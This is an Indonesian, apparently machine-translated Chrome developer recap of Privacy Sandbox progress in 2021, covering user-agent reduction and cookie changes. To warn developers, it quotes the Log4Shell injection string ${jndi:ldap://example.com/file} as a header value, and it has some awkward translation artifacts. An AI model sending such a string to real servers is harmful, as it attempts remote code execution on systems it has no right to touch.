Selamat datang di Progress in the Privacy edisi rangkuman 2021 Sandbox, melacak {i>milestone<i} pada menghentikan penggunaan cookie pihak ketiga di Chrome secara bertahap dan web pribadi. Biasanya, kami membagikan ringkasan update untuk Privacy Sandbox linimasa beserta berita dari seluruh proyeknya, tetapi Desember adalah bulan yang tenang. Sebagai gantinya, kita akan melihat kembali beberapa aktivitas selama tahun 2021 dan memberikan beberapa resolusi potensial yang dapat Anda buat sekarang kita sudah tahun baru.
Proses pengembangan Chromium
Agar fitur platform web baru masuk di Chromium, fitur tersebut harus melalui pengembangan terbuka project {i>checkout<i}. Pada tahun 2021, Tim Privacy Sandbox menghasilkan:
| 🥚 | Rencana untuk Membuat Prototipe | 19 |
| 🧪 | Niat untuk Bereksperimen | 7 |
| 🚀 | Tujuan Pengiriman | 11 |
Setiap pencapaian juga merupakan undangan bagi ekosistem web yang lebih luas untuk berkontribusi.
Intent to Prototype adalah checkpoint pertama, tempat kami mengundang diskusi dan eksperimen awal. Ini berarti proposal akan tersedia di GitHub, tempat Anda dapat mengajukan pertanyaan dengan membuat Isu atau bergabung dalam diskusi dan presentasi dalam standar grup seperti W3C dan IETF. Di sinilah coding dimulai, yang berarti Anda dapat mengharapkan fungsionalitas prototipe harus disediakan untuk pengujian pengembang di balik fitur flag. Masukan awal sangat penting untuk memvalidasi dan melakukan iterasi pada proposal.
Niat untuk Bereksperimen adalah langkah opsional jika kita ingin meminta uji coba origin. Pengembang dapat mendaftar untuk situs asal uji coba fitur, lalu mengujinya dalam produksi. Ini disebut eksperimen karena kita memiliki aspek tertentu dari fitur yang ingin kita validasi di lingkungan dunia nyata. Pengembang yang dapat menguji dan membagikan hasil pengujian tersebut memberikan masukan berharga untuk membantu mengembangkan fitur tersebut.
Niat Pengiriman adalah tonggak pencapaian akhir yang menunjukkan bahwa fitur sekarang sudah lengkap dan siap tersedia untuk umum. Setelah disetujui, fitur ini akan digabungkan ke rilis berikutnya dan kemudian berkembang melalui Canary, Beta, dan saluran Stabil. Pastikan Anda menguji situs Anda dengan Canary dan Chrome versi Beta untuk dideteksi dan melaporkan bug sebelum fitur mencapai Stabil.
Proposal
Setiap proposal Privacy Sandbox memiliki repositori GitHub yang menyertainya. J repositori menyediakan penjelasan untuk meringkas keseluruhan fungsi, sebuah spesifikasi untuk penerapan oleh browser, dan kontribusi dari seluruh ekosistem web dalam bentuk Masalah dan Permintaan Pull.
Di 14 repositori Privacy Sandbox, kami memiliki:
| 💬 | 545 | Masalah dibuat |
| 250 | Masalah ditutup | |
| 🛠️ | 261 | Permintaan Pull dibuat |
| 223 | Permintaan Pull digabungkan |
Bahasa dalam penjelasan dan spesifikasi sering kali ditargetkan kepada audiens sudah terbiasa dengan standar dan pengembangan {i>browser<i}, yang dapat sulit dilakukan jika Anda tidak terbiasa dengan hal tersebut. Namun, tujuan dari penjelasan adalah untuk jelaskan! Jika ada poin yang tidak jelas atau tidak dibahas, kami ingin Anda melaporkan Masalah agar kami dapat memperbarui dan mengklarifikasi penjelasannya.
Resolusi
Pembersihan musim semi agen pengguna
Sembari menghitung turun ke Tahun Baru, kami juga menghitung lebih banyak keduanya Chrome 100 dan pengurangan bertahap string agen pengguna. Ini bagus untuk meninjau kembali setiap penggunaan string agen pengguna dalam kode Anda, itu dipengaruhi oleh salah satu dari perubahan tersebut.
Untuk menemukan area tersebut:
- Telusuri
navigator.userAgentdi kode JavaScript Anda, atau akses ke headerUser-Agentdi kode server Anda. - Periksa penguraian string untuk asumsi tentang versi 2 digit. Sebagai
contoh, ekspresi reguler yang menentukan
\d\datau\d{2}harus diganti dengan\d+. - Periksa penggunaan string di mana pun Anda mengandalkan:
- versi platform (sistem operasi)
- versi build Chrome lengkap
- nama perangkat seluler
- Ini adalah nilai yang akan dikurangi menjadi string tetap di masa mendatang. Jika Anda memerlukan akses ke nilai ini, migrasikan ke Klien Agen Pengguna Petunjuk.
Ada satu pembaruan pada bulan Desember yang perlu disebutkan—jika Anda menggunakan Klien Agen Pengguna
Petunjuk, kami telah mengirimkan Rencana Pengiriman untuk memungkinkan pendelegasian petunjuk ke pengguna lain
asal dalam
HTML
melalui tag <meta>. Contoh:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
Jika Anda sedang bersemangat untuk membersihkan musim semi, Anda juga dapat mempertimbangkan alternatif penggunaan agen pengguna. Jika Anda menggunakan {i>string<i} untuk mendeteksi perangkat seluler, lalu selidiki apakah Anda dapat menggantinya dengan desain. Jika Anda memeriksa nama dan versi browser untuk dukungan fitur, lihat jika Anda dapat menggunakan deteksi fitur sebagai gantinya.
Harus selalu diingat bahwa agen pengguna, seperti yang disediakan klien
tidak dijamin akurat atau bahkan diberikan. Log4j terbaru
kerentanan, "Log4shell"
memberikan contoh dari risiko ini. Klien yang menetapkan string agen penggunanya ke
sertakan nilai seperti ${jndi:ldap://example.com/file} mungkin bisa mendapatkan situs
untuk secara aktif
mengurainya di server.
Pembuatan katalog cookie
Aktivitas tahun baru tradisional lainnya adalah
untuk memastikan Anda senang karena
jumlah kue kering yang sehat dengan bahan-bahan berkualitas. Seiring kita terus bergerak
terhadap penghentian penggunaan cookie pihak ketiga, Anda harus memastikan
cookie situs Anda yang akan terpengaruh. Tahun 2020 menjadi titik awal karena
perlu menandai semua cookie untuk
penggunaan
dengan SameSite=None.
Semua cookie yang Anda tetapkan atribut SameSite ke None akan memerlukan
memperbarui.
Ada tiga kemungkinan rute yang dapat dipertimbangkan saat ini:
- Jika cookie hanya diperlukan dalam hubungan 1:1 dengan situs tingkat atas,
lalu ikuti perkembangan CHIPS
proposal. Ini berarti menambahkan
Partitionedke cookie. - Jika cookie digunakan dalam konteks lintas situs, tetapi hanya di seluruh situs yang
memiliki dan mengoperasikannya, maka aplikasi ini dapat menjadi kandidat untuk Pihak Pertama
Kumpulan. Hal ini memerlukan pendefinisian
situs dalam kumpulan dan menambahkan atribut
SamePartyke cookie. - Jika cookie digunakan untuk memberikan beberapa bentuk nilai bersama di beberapa situs, pelajari rangkaian Privacy Sandbox yang lebih luas proposal untuk solusi alternatif yang tidak mengandalkan pelacakan lintas situs.
Jika Anda merasa sangat sadar kesehatan, maka ini juga waktu yang ideal untuk meninjau kembali semua penggunaan cookie Anda, karena kami memiliki resep bagus untuk meningkatkan cookie pihak pertama juga.
Masukan
Seiring kami terus memublikasikan pembaruan bulanan ini, dan progres sepanjang Privacy Sandbox secara keseluruhan, kami ingin memastikan bahwa developer menerima informasi dan dukungan yang mereka butuhkan. Beri tahu kami di @ChromiumDev Twitter jika ada hal yang dapat kami dalam rangkaian ini. Kami akan menggunakan input Anda untuk terus menyempurnakan format ini.
Lihat FAQ Privacy Sandbox, yang kami terus berkembang berdasarkan masalah yang Anda kirimkan ke dukungan developer repo Anda. Jika Anda memiliki pertanyaan seputar pengujian atau implementasi pada salah satu proposal, ayo bicarakan dengan kami di sana.